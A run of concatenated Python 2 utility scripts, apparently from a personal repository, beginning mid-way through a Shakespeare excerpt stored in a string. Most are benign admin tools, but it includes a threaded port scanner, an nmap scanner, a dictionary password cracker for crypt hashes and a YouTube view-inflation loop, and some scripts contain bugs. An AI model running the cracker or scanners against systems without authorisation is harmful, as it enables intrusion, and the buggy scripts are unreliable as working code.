And hangs resolved correction in the arm
That was uprear'd to execution.
HASTINGS
Besides, the king hath wasted all his rods
On late offenders, that he now doth lack
The very instruments of chastisement:
So that his power, like to a fangless lion,
May offer, but not hold.
ARCHBISHOP OF YORK
'Tis very true:
And therefore be assured, my good lord marshal,
If we do now make our atonement well,
Our peace will, like a broken limb united,
Grow stronger for the breaking.
MOWBRAY
Be it so.
Here is return'd my Lord of Westmoreland.
Re-enter WESTMORELAND
WESTMORELAND
The prince is here at hand: pleaseth your lordship
To meet his grace just distance 'tween our armies.
MOWBRAY
Your grace of York, in God's name then, set forward.
ARCHBISHOP OF YORK
Before, and greet his grace: my lord, we come.
Exeunt'''
count = {}
for character in info.upper():
count[character] = count.get(character, 0) + 1
value = pprint.pformat(count)
print(value)# Script Name : get_info_remoute_srv.py
# Author : Pavel Sirotkin
# Created : 3th April 2016
# Last Modified : -
# Version : 1.0.0
# Modifications :
# Description : this will get info about remoute server on linux through ssh connection. Connect these servers must be through keys
import subprocess
HOSTS = ('proxy1', 'proxy')
COMMANDS = ('uname -a', 'uptime')
for host in HOSTS:
result = []
for command in COMMANDS:
ssh = subprocess.Popen(["ssh", "%s" % host, command],
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
result.append(ssh.stdout.readlines())
print('--------------- ' + host + ' --------------- ')
for res in result:
if not res:
print(ssh.stderr.readlines())
break
else:
print(res)# Script Name : portscanner.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Port Scanner, you just pass the host and the ports
import optparse # Import the module
from socket import * # Import the module
from threading import * # Import the module
screenLock = Semaphore(value=1) # Prevent other threads from preceeding
def connScan(tgtHost, tgtPort): # Start of the function
try:
connSkt = socket(AF_INET, SOCK_STREAM) # Open a socket
connSkt.connect((tgtHost, tgtPort))
connSkt.send('')
results=connSkt.recv(100)
screenLock.acquire() # Acquire the lock
print '[+] %d/tcp open'% tgtPort
print '[+] ' + str(results)
except:
screenLock.acquire()
print '[-] %d/tcp closed '% tgtPort
finally:
screenLock.release()
connSkt.close()
def portScan(tgtHost, tgtPorts): # Start of the function
try:
tgtIP = gethostbyname(tgtHost) # Get the IP from the hostname
except:
print "[-] Cannot resolve '%s': Unknown host"%tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP) # Get hostname from IP
print '\n[+] Scan Results for: ' +tgtName[0]
except:
print '\n[+] Scan Results for: ' + tgtIP
setdefaulttimeout(1)
for tgtPort in tgtPorts: # Scan host and ports
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser('usage %prog -H'+' <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort',type='string', help='specify target port[s] seperated by a comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()# Script Name : work_connect.py
# Author : Craig Richards
# Created : 11th May 2012
# Last Modified : 31st October 2012
# Version : 1.1
# Modifications : 1.1 - CR - Added some extra code, to check an argument is passed to the script first of all, then check it's a valid input
# Description : This simple script loads everything I need to connect to work etc
import subprocess # Load the Library Module
import sys # Load the Library Module
import os # Load the Library Module
import time # Load the Library Module
dropbox = os.getenv("dropbox") # Set the variable dropbox, by getting the values of the environment setting for dropbox
rdpfile = ("remote\\workpc.rdp") # Set the variable logfile, using the arguments passed to create the logfile
conffilename=os.path.join(dropbox, rdpfile) # Set the variable conffilename by joining confdir and conffile together
remote = (r"c:\windows\system32\mstsc.exe ") # Set the variable remote with the path to mstsc
text = '''You need to pass an argument
-c Followed by login password to connect
-d to disconnect''' # Text to display if there is no argument passed or it's an invalid option - 1.2
if len(sys.argv) < 2: # Check there is at least one option passed to the script - 1.2
print text # If not print the text above - 1.2
sys.exit() # Exit the program - 1.2
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print text # Print the text, stored in the text variable - 1.2
sys.exit(0) # Exit the program
else:
if sys.argv[1].lower().startswith('-c'): # If the first argument is -c then
passwd = sys.argv[2] # Set the variable passwd as the second argument passed, in this case my login password
subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe connect -u username -p "+passwd))
subprocess.Popen((r"c:\geektools\puttycm.exe"))
time.sleep(15) # Sleep for 15 seconds, so the checkpoint software can connect before opening mstsc
subprocess.Popen([remote, conffilename])
elif sys.argv[1].lower().startswith('-d'): # If the first argument is -d then disconnect my checkpoint session.
subprocess.Popen((r"c:\Program Files\Checkpoint\Endpoint Connect\trac.exe disconnect "))
else:
print 'Unknown option - ' + text # If any other option is passed, then print Unknown option and the text from above - 1.2# Script Name : testlines.py
# Author : Craig Richards
# Created : 08th December 2011
# Last Modified :
# Version : 1.0
# Modifications : beven nyamande
# Description : This very simple script open a file and prints out 100 lines of whatever is set for the line variableest you want to print\n" # This sets the variable for the text that you want to print
def write_to_file(filename, txt):
with open(filename, 'w') as file_object:
s = file_object.write(txt)
if __name__ == '__main__':
write_to_file('test.txt', 'I am beven')
# Script Name : ping_subnet.py
# Author : Craig Richards
# Created : 12th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : After supplying the first 3 octets it will scan the final range for available addresses
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
filename = sys.argv[0] # Sets a variable for the script name
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print '''
You need to supply the first octets of the address Usage : ''' + filename + ''' 111.111.111 '''
sys.exit(0)
else:
if (len(sys.argv) < 2): # If no arguments are passed then display the help and instructions on how to run the script
sys.exit (' You need to supply the first octets of the address Usage : ' + filename + ' 111.111.111')
subnet = sys.argv[1] # Set the variable subnet as the three octets you pass it
if os.name == "posix": # Check the os, if it's linux then
myping = "ping -c 2 " # This is the ping command
elif os.name in ("nt", "dos", "ce"): # Check the os, if it's windows then
myping = "ping -n 2 " # This is the ping command
f = open('ping_' + subnet + '.log', 'w') # Open a logfile
for ip in range(2,255): # Set the ip variable for the range of numbers
ret = subprocess.call(myping + str(subnet) + "." + str(ip) ,
shell=True, stdout=f, stderr=subprocess.STDOUT) # Run the command pinging the servers
if ret == 0: # Depending on the response
f.write (subnet + "." + str(ip) + " is alive" + "\n") # Write out that you can receive a reponse
else:
f.write (subnet + "." + str(ip) + " did not respond" + "\n") # Write out you can't reach the box# Script Name : ping_servers.py
# Author : Craig Richards
# Created : 9th May 2012
# Last Modified : 14th May 2012
# Version : 1.1
# Modifications : 1.1 - 14th May 2012 - CR Changed it to use the config directory to store the server files
# Description : This script will, depending on the arguments supplied will ping the servers associated with that application group.
import os # Load the Library Module
import subprocess # Load the Library Module
import sys # Load the Library Module
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # Help Menu if called
print '''
You need to supply the application group for the servers you want to ping, i.e.
dms
swaps
Followed by the site i.e.
155
bromley'''
sys.exit(0)
else:
if (len(sys.argv) < 3): # If no arguments are passed,display the help/instructions on how to run the script
sys.exit ('\nYou need to supply the app group. Usage : ' + filename + ' followed by the application group i.e. \n \t dms or \n \t swaps \n then the site i.e. \n \t 155 or \n \t bromley')
appgroup = sys.argv[1] # Set the variable appgroup as the first argument you supply
site = sys.argv[2] # Set the variable site as the second argument you supply
if os.name == "posix": # Check the os, if it's linux then
myping = "ping -c 2 " # This is the ping command
elif os.name in ("nt", "dos", "ce"): # Check the os, if it's windows then
myping = "ping -n 2 " # This is the ping command
if 'dms' in sys.argv: # If the argument passed is dms then
appgroup = 'dms' # Set the variable appgroup to dms
elif 'swaps' in sys.argv: # Else if the argment passed is swaps then
appgroup = 'swaps' # Set the variable appgroup to swaps
if '155' in sys.argv: # If the argument passed is 155 then
site = '155' # Set the variable site to 155
elif 'bromley' in sys.argv: # Else if the argument passed is bromley
site = 'bromley' # Set the variable site to bromley
filename = sys.argv[0] # Sets a variable for the script name
logdir = os.getenv("logs") # Set the variable logdir by getting the OS environment logs
logfile = 'ping_' + appgroup + '_' + site + '.log' # Set the variable logfile, using the arguments passed to create the logfile
logfilename = os.path.join(logdir, logfile) # Set the variable logfilename by joining logdir and logfile together
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable - 1.2
conffile = (appgroup + '_servers_' + site + '.txt') # Set the variable conffile - 1.2
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together - 1.2
f = open(logfilename, "w") # Open a logfile to write out the output
for server in open(conffilename): # Open the config file and read each line - 1.2
ret = subprocess.call(myping + server, shell=True, stdout=f, stderr=subprocess.STDOUT) # Run the ping command for each server in the list.
if ret == 0: # Depending on the response
f.write (server.strip() + " is alive" + "\n") # Write out that you can receive a reponse
else:
f.write (server.strip() + " did not respond" + "\n") # Write out you can't reach the box
print ("\n\tYou can see the results in the logfile : " + logfilename); # Show the location of the logfile# Script Name : backup_automater_services.py
# Author : Craig Richards
# Created : 24th October 2012
# Last Modified : 13th February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up the comments and syntax
# Description : This will go through and backup all my automator services workflows
import datetime # Load the library module
import os # Load the library module
import shutil # Load the library module
today = datetime.date.today() # Get Today's date
todaystr = today.isoformat() # Format it so we can use the format to create the directory
confdir = os.getenv("my_config") # Set the variable by getting the value from the OS setting
dropbox = os.getenv("dropbox") # Set the variable by getting the value from the OS setting
conffile = ('services.conf') # Set the variable as the name of the configuration file
conffilename = os.path.join(confdir, conffile) # Set the variable by combining the path and the file name
sourcedir = os.path.expanduser('~/Library/Services/') # Source directory of where the scripts are located
destdir = os.path.join(dropbox, "My_backups" + "/" +
"Automater_services" + todaystr + "/") # Combine several settings to create
# the destination backup directory
for file_name in open(conffilename): # Walk through the configuration file
fname = file_name.strip() # Strip out the blank lines from the configuration file
if fname: # For the lines that are not blank
sourcefile = os.path.join(sourcedir, fname) # Get the name of the source files to backup
destfile = os.path.join(destdir, fname) # Get the name of the destination file names
shutil.copytree(sourcefile, destfile) # Copy the directories# Script Name : powerup_checks.py
# Author : Craig Richards
# Created : 25th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Creates an output file by pulling all the servers for the given site from SQLITE database, then goes through the list pinging the servers to see if they are up on the network
import sys # Load the Library Module
import sqlite3 # Load the Library Module
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
dropbox=os.getenv("dropbox") # Set the variable, by getting the value of the variable from the OS
config=os.getenv("my_config") # Set the variable, by getting the value of the variable from the OS
dbfile=("Databases/jarvis.db") # Set the variable to the database
master_db=os.path.join(dropbox, dbfile) # Create the variable by linking the path and the file
listfile=("startup_list.txt") # File that will hold the servers
serverfile=os.path.join(config,listfile) # Create the variable by linking the path and the file
outputfile=('server_startup_'+strftime("%Y-%m-%d-%H-%M")+'.log')
# Below is the help text
text = '''
You need to pass an argument, the options the script expects is
-site1 For the Servers relating to site1
-site2 For the Servers located in site2'''
def windows(): # This is the function to run if it detects the OS is windows.
f = open(outputfile, 'a') # Open the logfile
for server in open(serverfile,'r'): # Read the list of servers from the list
#ret = subprocess.call("ping -n 3 %s" % server.strip(), shell=True,stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
ret = subprocess.call("ping -n 3 %s" % server.strip(),stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # Depending on the response
f.write ("%s: is alive" % server.strip().ljust(15) + "\n") # Write out to the logfile is the server is up
else:
f.write ("%s: did not respond" % server.strip().ljust(15) + "\n") # Write to the logfile if the server is down
def linux(): # This is the function to run if it detects the OS is nix.
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open(serverfile,'r'): # Read the list of servers from the list
ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=open('/dev/null', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # Depending on the response
f.write ("%s: is alive" % server.strip().ljust(15) + "\n") # Write out to the logfile is the server is up
else:
f.write ("%s: did not respond" % server.strip().ljust(15) + "\n") # Write to the logfile if the server is down
def get_servers(query): # Function to get the servers from the database
conn = sqlite3.connect(master_db) # Connect to the database
cursor = conn.cursor() # Create the cursor
cursor.execute('select hostname from tp_servers where location =?',(query,)) # SQL Statement
print ('\nDisplaying Servers for : ' + query + '\n')
while True: # While there are results
row = cursor.fetchone() # Return the results
if row == None:
break
f = open(serverfile, 'a') # Open the serverfile
f.write("%s\n" % str(row[0])) # Write the server out to the file
print row[0] # Display the server to the screen
f.close() # Close the file
def main(): # Main Function
if os.path.exists(serverfile): # Checks to see if there is an existing server file
os.remove(serverfile) # If so remove it
if len(sys.argv) < 2: # Check there is an argument being passed
print text # Display the help text if there isn't one passed
sys.exit() # Exit the script
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv: # If the ask for help
print text # Display the help text if there isn't one passed
sys.exit(0) # Exit the script after displaying help
else:
if sys.argv[1].lower().startswith('-site1'): # If the argument is site1
query = 'site1' # Set the variable to have the value site
elif sys.argv[1].lower().startswith('-site2'): # Else if the variable is bromley
query = 'site2' # Set the variable to have the value bromley
else:
print '\n[-] Unknown option [-] ' + text # If an unknown option is passed, let the user know
sys.exit(0)
get_servers(query) # Call the get servers funtion, with the value from the argument
if os.name == "posix": # If the OS is linux.
linux() # Call the linux function
elif os.name in ("nt", "dos", "ce"): # If the OS is Windows...
windows() # Call the windows function
print ('\n[+] Check the log file ' + outputfile + ' [+]\n') # Display the name of the log
if __name__ == '__main__':
main() # Call the main function# Script Name : password_cracker.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Old school password cracker using python
from sys import platform as _platform
# Check the current operating system to import the correct version of crypt
if _platform in ["linux", "linux2", "darwin"]: # darwin is _platform name for Mac OS X
import crypt # Import the module
elif _platform == "win32":
# Windows
try:
import fcrypt # Try importing the fcrypt module
except ImportError:
print 'Please install fcrypt if you are on Windows'
def testPass(cryptPass): # Start the function
salt = cryptPass[0:2]
dictFile = open('dictionary.txt','r') # Open the dictionary file
for word in dictFile.readlines(): # Scan through the file
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt) # Check for password in the file
if (cryptWord == cryptPass):
print "[+] Found Password: "+word+"\n"
return
print "[-] Password Not Found.\n"
return
def main():
passFile = open('passwords.txt') # Open the password file
for line in passFile.readlines(): # Read through the file
if ":" in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ') # Prepare the user name etc
print "[*] Cracking Password For: " + user
testPass(cryptPass) # Call it to crack the users password
if __name__ == "__main__":
main()# Script Name : check_file.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications : with statement added to ensure correct file closure
# Description : Check a file exists and that we can read the file
from __future__ import print_function
import sys # Import the Modules
import os # Import the Modules
# Prints usage if not appropriate length of arguments are provided
def usage():
print('[-] Usage: python check_file.py <filename1> [filename2] ... [filenameN]')
exit(0)
# Readfile Functions which open the file that is passed to the script
def readfile(filename):
with open(filename, 'r') as f: # Ensure file is correctly closed under all circumstances
line = f.read()
print(line)
def main():
if len(sys.argv) >= 2: # Check the arguments passed to the script
filenames = sys.argv[1:]
for filename in filenames: # Iterate for each filename passed in command line argument
if not os.path.isfile(filename): # Check the File exists
print ('[-] ' + filename + ' does not exist.')
filenames.remove(filename) #remove non existing files from filenames list
continue
if not os.access(filename, os.R_OK): # Check you can read the file
print ('[-] ' + filename + ' access denied')
filenames.remove(filename) # remove non readable filenames
continue
else:
usage() # Print usage if not all parameters passed/Checked
# Read the content of each file
for filename in filenames:
print ('[+] Reading from : ' + filename) # Display Message and read the file contents
readfile(filename)
if __name__ == '__main__':
main()
# Script Name : nmap_scan.py
# Author : Craig Richards
# Created : 24th May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This scans my scripts directory and gives a count of the different types of scripts, you need nmap installed to run this
import nmap # Import the module
import optparse # Import the module
def nmapScan(tgtHost, tgtPort): # Create the function, this fucntion does the scanning
nmScan = nmap.PortScanner()
nmScan.scan(tgtHost, tgtPort)
state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
print "[*] " + tgtHost + " tcp/" + tgtPort + " " + state
def main(): # Main Program
parser = optparse.OptionParser('usage%prog ' + '-H <host> -p <port>') # Display options/help if required
parser.add_option('-H', dest='tgtHost', type='string', help='specify host')
parser.add_option('-p', dest='tgtPort', type='string', help='port')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
for tgtPort in tgtPorts: # Scan the hosts with the ports etc
nmapScan(tgtHost, tgtPort)
if __name__ == '__main__':
main()
import urllib2
try:
urllib2.urlopen("http://google.com", timeout=2)
print ("working connection")
except urllib2.URLError:
print ("No internet connection")# Script Name : sqlite_check.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Runs checks to check my SQLITE database
import sqlite3 as lite
import sys
import os
dropbox= os.getenv("dropbox")
dbfile=("Databases\jarvis.db")
master_db=os.path.join(dropbox, dbfile)
con = None
try:
con = lite.connect(master_db)
cur = con.cursor()
cur.execute('SELECT SQLITE_VERSION()')
data = cur.fetchone()
print "SQLite version: %s" % data
except lite.Error, e:
print "Error %s:" % e.args[0]
sys.exit(1)
finally:
if con:
con.close()
con = lite.connect(master_db)
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
rows = cur.fetchall()
for row in rows:
print row
con = lite.connect(master_db)
cur=con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
while True:
row = cur.fetchone()
if row == None:
break
print row[0]import pygame, sys, time
from pygame.locals import *
pygame.init()
window = pygame.display.set_mode((400, 300), 0, 32)
pygame.display.set_caption("Shape")
WHITE = (255, 255, 255)
GREEN = ( 0, 255, 0)
window.fill(WHITE)
pygame.draw.polygon(window, GREEN, ((146, 0), (236, 277), (56, 277)))
# Game logic
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
pygame.display.update()# Script Name : fileinfo.py
# Author : Not sure where I got this from
# Created : 28th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Show file information for a given file
# get file information using os.stat()
# tested with Python24 vegsaeat 25sep2006
from __future__ import print_function
import os
import sys
import stat # index constants for os.stat()
import time
try_count = 16
while try_count:
file_name = raw_input("Enter a file name: ") # pick a file you have
try_count >>= 1
try:
file_stats = os.stat(file_name)
break
except OSError:
print ("\nNameError : [%s] No such file or directory\n", file_name)
if try_count == 0:
print ("Trial limit exceded \nExiting program")
sys.exit()
# create a dictionary to hold file info
file_info = {
'fname': file_name,
'fsize': file_stats[stat.ST_SIZE],
'f_lm' : time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_MTIME])),
'f_la' : time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_ATIME])),
'f_ct' : time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_CTIME]))
}
print ("\nfile name = %(fname)s", file_info)
print ("file size = %(fsize)s bytes", file_info)
print ("last modified = %(f_lm)s", file_info)
print ("last accessed = %(f_la)s", file_info)
print ("creation time = %(f_ct)s\n", file_info)
if stat.S_ISDIR(file_stats[stat.ST_MODE]):
print ("This a directory")
else:
print ("This is not a directory\n")
print ("A closer look at the os.stat(%s) tuple:" % file_name)
print (file_stats)
print ("\nThe above tuple has the following sequence:")
print ("""st_mode (protection bits), st_ino (inode number),
st_dev (device), st_nlink (number of hard links),
st_uid (user ID of owner), st_gid (group ID of owner),
st_size (file size, bytes), st_atime (last access time, seconds since epoch),
st_mtime (last modification time), st_ctime (time of creation, Windows)"""
)# Script Name : dir_test.py
# Author : Craig Richards
# Created : 29th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Tests to see if the directory testdir exists, if not it will create the directory for you
import os # Import the OS module
if not os.path.exists('testdir'): # Check to see if it exists
os.makedirs('testdir') # Create the directoryimport time
import webbrowser
#how much views you want
#This only works when video has less than 300 views, it won't work when there are more than 300 views...
#due to youtube's policy.
print("Enjoy your Time\n" + time.ctime())
for count in range(30):
time.sleep(5)
webbrowser.open("https://www.youtube.com/watch?v=o6A7nf3IeeA")# batch_file_rename.py
# Created: 6th August 2012
'''
This will batch rename a group of files in a given directory,
once you pass the current and new extensions
'''
__author__ = 'Craig Richards'
__version__ = '1.0'
import os
import sys
def batch_rename(work_dir, old_ext, new_ext):
'''
This will batch rename a group of files in a given directory,
once you pass the current and new extensions
'''
# files = os.listdir(work_dir)
for filename in os.listdir(work_dir):
# Get the file extension
file_ext = os.path.splitext(filename)[1]
# Start of the logic to check the file extensions, if old_ext = file_ext
if old_ext == file_ext:
# Set newfile to be the filename, replaced with the new extension
newfile = filename.replace(old_ext, new_ext)
# Write the files
os.rename(
os.path.join(work_dir, filename),
os.path.join(work_dir, newfile)
)
def main():
'''
This will be called if the script is directly invoked.
'''
# Set the variable work_dir with the first argument passed
work_dir = sys.argv[1]
# Set the variable old_ext with the second argument passed
old_ext = sys.argv[2]
# Set the variable new_ext with the third argument passed
new_ext = sys.argv[3]
batch_rename(work_dir, old_ext, new_ext)
if __name__ == '__main__':
main()
# Script Name : recyclebin.py
# Author : Craig Richards
# Created : 07th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Scans the recyclebin and displays the files in there, originally got this script from the Violent Python book
import os # Load the Module
import optparse # Load the Module
from _winreg import * # Load the Module
def sid2user(sid): # Start of the function to gather the user
try:
key = OpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
(value, type) = QueryValueEx(key, 'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid
def returnDir(): # Start of the function to search through the recyclebin
dirs=['c:\\Recycler\\','C:\\Recycled\\','C:\\$RECYCLE.BIN\\']
#dirs=['c:\\$RECYCLE.BIN\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
def findRecycled(recycleDir): # Start of the function, list the contents of the recyclebin
dirList = os.listdir(recycleDir)
for sid in dirList:
files = os.listdir(recycleDir + sid)
user = sid2user(sid)
print '\n[*] Listing Files for User: ' + str(user)
for file in files:
print '[+] Found File: ' + str(file)
def main():
recycleDir = returnDir()
findRecycled(recycleDir)
if __name__ == '__main__':
main()# Script Name : powerdown_startup.py
# Author : Craig Richards
# Created : 05th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This goes through the server list and pings the machine, if it's up it will load the putty session, if its not it will notify you.
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
def windows(): # This is the function to run if it detects the OS is windows.
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open('startup_list.txt','r'): # Read the list of servers from the list
ret = subprocess.call("ping -n 3 %s" % server, shell=True,stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # If you get a response.
f.write ("%s: is alive, loading PuTTY session" % server.strip() + "\n") # Write out to the logfile
subprocess.Popen(('putty -load '+server)) # Load the putty session
else:
f.write ("%s : did not respond" % server.strip() + "\n") # Write to the logfile if the server is down
def linux():
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open('startup_list.txt'): # Read the list of servers from the list
ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=open('/dev/null', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # If you get a response.
f.write ("%s: is alive" % server.strip() + "\n") # Print a message
subprocess.Popen(['ssh', server.strip()])
else:
f.write ("%s: did not respond" % server.strip() + "\n")
# End of the functions
# Start of the Main Program
if os.name == "posix": # If the OS is linux...
linux() # Call the linux function
elif os.name in ("nt", "dos", "ce"): # If the OS is Windows...
windows() # Call the windows functionimport SimpleHTTPServer
import SocketServer
PORT = 8000 #This will serve at port 8080
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()# Script Name : folder_size.py
# Author : Craig Richards
# Created : 19th July 2012
# Last Modified : 22 February 2016
# Version : 1.0.1
# Modifications : Modified the Printing method and added a few comments
# Description : This will scan the current directory and all subdirectories and display the size.
import os
import sys ''' Load the library module and the sys module for the argument vector'''
try:
directory = sys.argv[1] # Set the variable directory to be the argument supplied by user.
except IndexError:
sys.exit("Must provide an argument.")
dir_size = 0 # Set the size to 0
fsizedicr = {'Bytes': 1,
'Kilobytes': float(1) / 1024,
'Megabytes': float(1) / (1024 * 1024),
'Gigabytes': float(1) / (1024 * 1024
* 1024)}
for (path, dirs, files) in os.walk(directory): # Walk through all the directories. For each iteration, os.walk returns the folders, subfolders and files in the dir.
for file in files: # Get all the files
filename = os.path.join(path, file)
dir_size += os.path.getsize(filename) # Add the size of each file in the root dir to get the total size.
fsizeList = [str(round(fsizedicr[key] * dir_size, 2)) + " " + key for key in fsizedicr] # List of units
if dir_size == 0: print ("File Empty") # Sanity check to eliminate corner-case of empty file.
else:
for units in sorted(fsizeList)[::-1]: # Reverse sort list of units so smallest magnitude units print first.
print ("Folder Size: " + units)# Script Name : env_check.py
# Author : Craig Richards
# Created : 14th May 2012
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up comments and syntax
# Description : This script will check to see if all of the environment variables I require are set
import os
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable
conffile = 'env_check.conf' # Set the variable conffile
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together
for env_check in open(conffilename): # Open the config file and read all the settings
env_check = env_check.strip() # Set the variable as itsself, but strip the extra text out
print '[{}]'.format(env_check) # Format the Output to be in Square Brackets
newenv = os.getenv(env_check) # Set the variable newenv to get the settings from the OS what is currently set for the settings out the configfile
if newenv is None: # If it doesn't exist
print env_check, 'is not set' # Print it is not set
else: # Else if it does exist
print 'Current Setting for {}={}\n'.format(env_check, newenv) # Print out the details# Script Name : script_count.py
# Author : Craig Richards
# Created : 27th February 2012
# Last Modified : 20th July 2012
# Version : 1.3
# Modifications : 1.1 - 28-02-2012 - CR - Changed inside github and development functions, so instead of if os.name = "posix" do this else do this etc
# : I used os.path.join, so it condensed 4 lines down to 1
# : 1.2 - 10-05-2012 - CR - Added a line to include PHP scripts.
# : 1.3 - 20-07-2012 - CR - Added the line to include Batch scripts
# Description : This scans my scripts directory and gives a count of the different types of scripts
import os # Load the library module
path = os.getenv("scripts") # Set the variable path by getting the value from the OS environment variable scripts
dropbox = os.getenv("dropbox") # Set the variable dropbox by getting the value from the OS environment variable dropbox
def clear_screen(): # Function to clear the screen
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
os.system('clear') # Clear the Screen
elif os.name in ("nt", "dos", "ce"): # DOS/Windows
os.system('CLS') # Clear the Screen
def count_files(path, extensions): # Start of the function to count the files in the scripts directory, it counts the extension when passed below
counter = 0 # Set the counter to 0
for root, dirs, files in os.walk(path): # Loop through all the directories in the given path
for file in files: # For all the files
counter += file.endswith(extensions) # Count the files
return counter # Return the count
def github(): # Start of the function just to count the files in the github directory
github_dir = os.path.join(dropbox, 'github') # Joins the paths to get the github directory - 1.1
github_count = sum((len(f) for _, _, f in os.walk(github_dir))) # Get a count for all the files in the directory
if github_count > 5: # If the number of files is greater then 5, then print the following messages
print '\nYou have too many in here, start uploading !!!!!'
print 'You have: ' + str(github_count) + ' waiting to be uploaded to github!!'
elif github_count == 0: # Unless the count is 0, then print the following messages
print '\nGithub directory is all Clear'
else: # If it is any other number then print the following message, showing the number outstanding.
print '\nYou have: ' + str(github_count) + ' waiting to be uploaded to github!!'
def development(): # Start of the function just to count the files in the development directory
dev_dir = os.path.join(path, 'development') # Joins the paths to get the development directory - 1.1
dev_count = sum((len(f) for _, _, f in os.walk(dev_dir))) # Get a count for all the files in the directory
if dev_count > 10: # If the number of files is greater then 10, then print the following messages
print '\nYou have too many in here, finish them or delete them !!!!!'
print 'You have: ' + str(dev_count) + ' waiting to be finished!!'
elif dev_count ==0: # Unless the count is 0, then print the following messages
print '\nDevelopment directory is all clear'
else:
print '\nYou have: ' + str(dev_count) + ' waiting to be finished!!' # If it is any other number then print the following message, showing the number outstanding.
clear_screen() # Call the function to clear the screen
print '\nYou have the following :\n'
print 'AutoIT:\t' + str(count_files(path, '.au3')) # Run the count_files function to count the files with the extension we pass
print 'Batch:\t' + str(count_files(path, ('.bat', ',cmd'))) # 1.3
print 'Perl:\t' + str(count_files(path, '.pl'))
print 'PHP:\t' + str(count_files(path, '.php')) # 1.2
print 'Python:\t' + str(count_files(path, '.py'))
print 'Shell:\t' + str(count_files(path, ('.ksh', '.sh', '.bash')))
print 'SQL:\t' + str(count_files(path, '.sql'))
github() # Call the github function
development() # Call the development function# Script Name : script_listing.py
# Author : Craig Richards
# Created : 15th February 2012
# Last Modified : 29th May 2012
# Version : 1.2
# Modifications : 1.1 - 28-02-2012 - CR - Added the variable to get the logs directory, I then joined the output so the file goes to the logs directory
# : 1.2 - 29-05/2012 - CR - Changed the line so it doesn't ask for a directory, it now uses the environment varaible scripts
# Description : This will list all the files in the given directory, it will also go through all the subdirectories as well
import os # Load the library module
logdir = os.getenv("logs") # Set the variable logdir by getting the value from the OS environment variable logs
